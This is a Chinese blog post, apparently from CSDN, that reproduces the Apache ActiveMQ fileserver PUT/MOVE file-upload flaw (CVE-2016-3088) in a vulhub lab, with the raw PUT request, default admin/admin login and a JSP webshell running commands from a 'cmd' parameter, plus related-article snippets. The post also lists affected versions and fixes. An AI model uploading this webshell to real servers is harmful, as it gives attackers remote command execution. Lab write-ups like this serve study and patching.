任意文件上传mysql_ActiveMq PUT任意文件上传漏洞(CVE-2016-3088)漏洞复现

最新推荐文章于 2024-02-25 23:24:12 发布
最新推荐文章于 2024-02-25 23:24:12 发布
阅读量425 收藏 1
点赞数
文章标签: 任意文件上传mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32515349/article/details/114483525
版权

漏洞原理

该漏洞出现在fileserver应用中,ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问

环境搭建

使用vulhub一键搭建,靶机kali:192.168.1771.37

docker-compose up -d

环境搭建成功,浏览器访问:http://IP:8161

b3ed2f14a909bef0c2007ef8e2e0474c.png

bd936fe5711593daf8074baf6b3c9281.png

漏洞复现

登录admin账号:默认账号admin/admin,抓包进行修改,使用PUT方法上传文件。ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

上传jsp文件(系统不稳定,有时成功有时失败),

863ce0626bc77685e5321c0b87ffdcc0.png

PUT /fileserver/2.jsp HTTP/1.1Host:192.168.177.137:8161User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Cookie: JSESSIONID=18wws8yzr1a04iz9gfpkkar3p

Authorization: Basic YWRtaW46YWRtaW4=

X-Forwarded-For: 8.8.8.8

Connection: close

Content-Length: 329

out.print("Hello");

String strcmd=request.getParameter("cmd");

String line=null;

Process p=Runtime.getRuntime().exec(strcmd);

BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

while((line=br.readLine())!=null){

out.print(line+"");

}

%>

56ef9d62911bc06550bed2e7d855d63f.png

使用MOVE方法移动文件,成功的包没截上,再次上传是500回显,文件已经上传成功,访问地址,成功解析jsp

ea46fd798d03fc6fe50cc87a94902eac.png

d95a0c1245bad598d7ff391d50afe76a.png

漏洞影响

漏洞影响版本:Apache ActiveMQ 5.x ~ 5.14.0

漏洞修复

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

1bde78d28576eef2b2a2623bec5b209d.png

参考文献

https://paper.seebug.org/346/

https://blog.csdn.net/yukinorong/article/details/106942279

https://www.jb51.net/article/167145.htm

盲眼刺客
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ActiveMQ  任意文件上传 漏洞 PUT
U_U520的博客
01-10 1199
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;是消息队列的容器,专注于高并发的环境,比如天猫淘宝一秒钟上亿请求,就好比是水池,把大量短时间无法处理的数据,冗余囤积到ActiveMQ里,再分门别类,按类专门处理,从而提高处理效率。方法1 PUT /fileserver/a../../%08/..%08/.%08/%08。注意: 返回包必须是204 才能证明执行成功。
【墨者学院】ActiveMQ任意文件写入漏洞
hehigoxqc606的博客
08-31 338
【墨者学院】ActiveMQ任意文件写入漏洞 简介: ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java的 web 容器,例如 JSP 和 servlet 提供运行环境。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷。 实验过程: 第一步:访问靶场..
CVE-2016-3088Activemq文件上传以及弱口令
Lazy_ass的博客
11-25 6541
CVE-2016-3088 PUT方法上传文件(自建环境) 漏洞描述: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件 Apache ActiveMQ 5.14.0之前5.x版本的Fileserver Web应用中存在安全漏洞。远程攻击者可通过发送HTTP PUT和HTTP MOVE请求利用该漏洞上传并执行任意文件 漏洞复现流程 1: 首先需要判断/fileserver目录是否具有访问权限 2: 访问/admin/test/systemProperties.js
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088) 复现
weixin_30709635的博客
09-04 598
漏洞复现 直接写 shell 写 shell 的话,需要写在 admin 或者 api 中,也就是需要登录,没有密码的话完成不了写 shell 操作。 该环境默认的口令为 admin/admin。 访问 http://ip:8161/admin/test/systemProperties.jsp 获得当前系统的路径 上传 jsp 小马,返回204,但是在...
ActiveMq PUT任意文件上传漏洞CVE-2016-3088漏洞复现
最新发布
weixin_74790320的博客
02-25 503
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
apache-activemq-5.0.0-src.zip_ActiveMQ 源代码_activemq_activemq.src
09-20
7. **构建系统**:ActiveMQ通常使用Maven作为构建工具,源代码中会有相关的`pom.xml`文件,通过这些文件可以了解项目的依赖关系和构建过程。 8. **测试框架**:源代码会包含单元测试和集成测试,以确保ActiveMQ的...
ActiveMQ反序列化漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
Spring-ActiveMQ.rar_Spring Activemq_activemq_activemq spring
09-19
要在Spring应用中配置ActiveMQ,我们需要在Spring的配置文件(如:applicationContext.xml)中添加以下内容: - 引入JMS相关的命名空间:`...
msg-web.zip_activemq_msg active 2_msg-active_msg_active_msgactiv
09-21
在IT行业中,消息中间件是实现系统间异步通信、解耦合的重要工具,而Apache ActiveMQ正是这样一个广泛使用的开源消息代理。本示例“msg-web.zip_activemq_msg active 2_msg-active_msg_active_msgactiv”关注的是...
activeMQ文件上传的应用
01-22
activeMQ与uploadify整合
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088)
Alluresec的博客
11-20 719
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088) 0X00简介 Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 0X01漏洞概述 ActiveMQ的web控制台分三个应用,分别是admin、api和fi...
ActiveMQ(CVE-2016-3088)复现学习笔记
hklearner的博客
03-28 593
ActiveMQ复现学习笔记 (CVE-2016-3088) 漏洞描述 影响版本:Apache ActiveMQ 5.x~5.14.0 漏洞产生原因:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现及排查
dayouzi的博客
08-14 2232
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
【vulhub漏洞复现CVE-2016-3088 ActiveMQ任意文件写入漏洞
RexHa的博客
02-27 2255
漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
ActiveMQ 任意文件上传漏洞复现
YJ_12340的博客
08-30 669
​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息。​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下。​ 同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下。​ 继续修改请求包协议为 MOVE,并在头部中添加 Destination。​ 如上图,response 包中返回状态码为 204,即文件上传成功。...
Apache activeMQ漏洞复现put和move方法
ranuy阮的博客
04-19 2015
漏洞说明 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码...
[应用安全]之ActiveMQ漏洞利用方法总结
zhang8907xiaoyue的博客
03-22 7201
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实现,尽管JMS 应用介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码
02 - vulhub - ActiveMQ任意文件写入漏洞 - CVE-2016-3088 复现
易编橙 · 终身成长社群,相遇已是上上签!
09-22 756
漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞
CVE-2016-3088复现
07-28
CVE-2016-3088是一个存在于fileserver应用中的漏洞,其原理是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值